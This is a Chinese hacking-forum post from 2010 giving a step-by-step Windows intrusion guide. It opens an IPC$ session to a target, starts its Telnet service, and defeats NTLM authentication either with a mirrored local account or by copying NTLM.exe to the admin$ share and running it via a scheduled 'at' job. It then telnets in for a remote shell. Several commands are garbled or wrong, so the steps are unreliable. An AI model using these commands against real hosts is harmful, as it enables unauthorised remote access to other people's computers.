-- 作者:轻轻风聆
-- 发布时间:2010/10/28 13:29:35
-- Telnet入侵指令分析
简单介绍关于NTLM验证
由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Telnet添加了身份验证,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外。(关于NTLM我有写一个专门帖子。。各位可以去看看)
1.使用telnet连接主机
指令格式(cmd):telnet 192.168.0.0 连接端口号
如果要断开。。就是exit。。
这个本人写了一个很详细的帖子发表在黑盟“远程开启telnet“
2.典型telnet入侵攻略
第一步:建立IPC$连接(本人也写了很详细关于IPC$连接的方法),
第二步:开启远程telnet连接,首先在cmd(确定此时的根目录是目标的)输入指令。。service 开启service项目。。。仔细找找。。。就有Telnet服务项。。。。把它打开。。。
第三步:取消IPC$连接:net use 192.168.0.0 /del
第四步:去掉NTLM验证,如果没有去除目标上的NTLM验证,在登录目标的电脑的时候就会失败。
其实方法有很多种。。。本人就介绍我最常用的一个。。也是最简单的方法吧。。。
首先,在本地计算机上建立一个与远程主机上相同的账号和密码。
指令:net localgroup alpha /add 不过确定对方的账号也是alpha。。因为要相同的。。
第二步:通过“开始”→“程序”→“附件”找到“命令提示符”,使用鼠标右键单击“命令提示符”,然后选择“属性”。
在“以其他用户身份运行(U)”前面挑上挑。。然后点。。“确定”接着。。仍然按照上述路径找到“命令提示符”(cmd)。。之后用左健打开它。。。。
之后写上用户名和密码。。。alpha的
然后点确定。。。得到cmd shell框。。。
之后输入我们的指令:telnet 192.168.0.0
现在就会显示一个更新后的cmd shell。。这个shell就192.168.0.0上的。。。
其实去掉NTLM验证的方法很多。。。我再介绍给大家一个方法。。。
这个方法就是超级菜鸟话。。。因为我们需要用到一个工具。。NTLM.exe。。这个工具就像是3389.exe一样。。只要把3389.exe传到一台机器上去执行。。那台机器上的3389端口就会自动打开。。。
NTLM.exe的运作概念和3389.exe是一样的。。。我们需要做的就是把我们的NTLM.exe传到192.168.0.0这个机器上。。。
首先:开cmd。。
然后输入指令:net use \\\\192.168.0.0\\ipc$*""\\user:administrator
之后再输入指令:copy c:\\NTLM.exe \\\\192.168.0.0\\admin$
解释一下:\\admin$是使用192.168.0.0主机上的admin用户共享权限。。。。
然后再输入察看时间指令:net time \\\\192.168.0.0
我们假如对方的时间是2007/9/21 下午3点21分。。。
之后再输入执行指令:at \\\\192.168.0.0 15:22 NTLM.exe
解释一下:15:22是24小时至的下午3点22分。。。cmd shell输入指令时一定要写24小时的。。
之后当按回车确定后得到:新增加一项作业 或者是什么指令成功完成的提示字后。。。等待1分钟。。。让cmd完成我们的shell command。。。
之后我们再输入指令:telnet 192.168.0.0
Ok.........................大功告成。。。。
如果要恢复NTLM验证。。。我们要用到一个shell工具:resumetelnet.exe
resumetelnet.exe使用的方法是这样的。。。
命令格式:ResumeTelnet.exe \\\\\\\\server name password
其中server name是主机域名或者是IP都可以。。。我们就写192.168.0.0
password当然就是密码了。。。。
回车确定。。。。。。。。。。。。。。。。。。当显示the command completed successfully后。。一切完成。。。。。。。。。。。。
|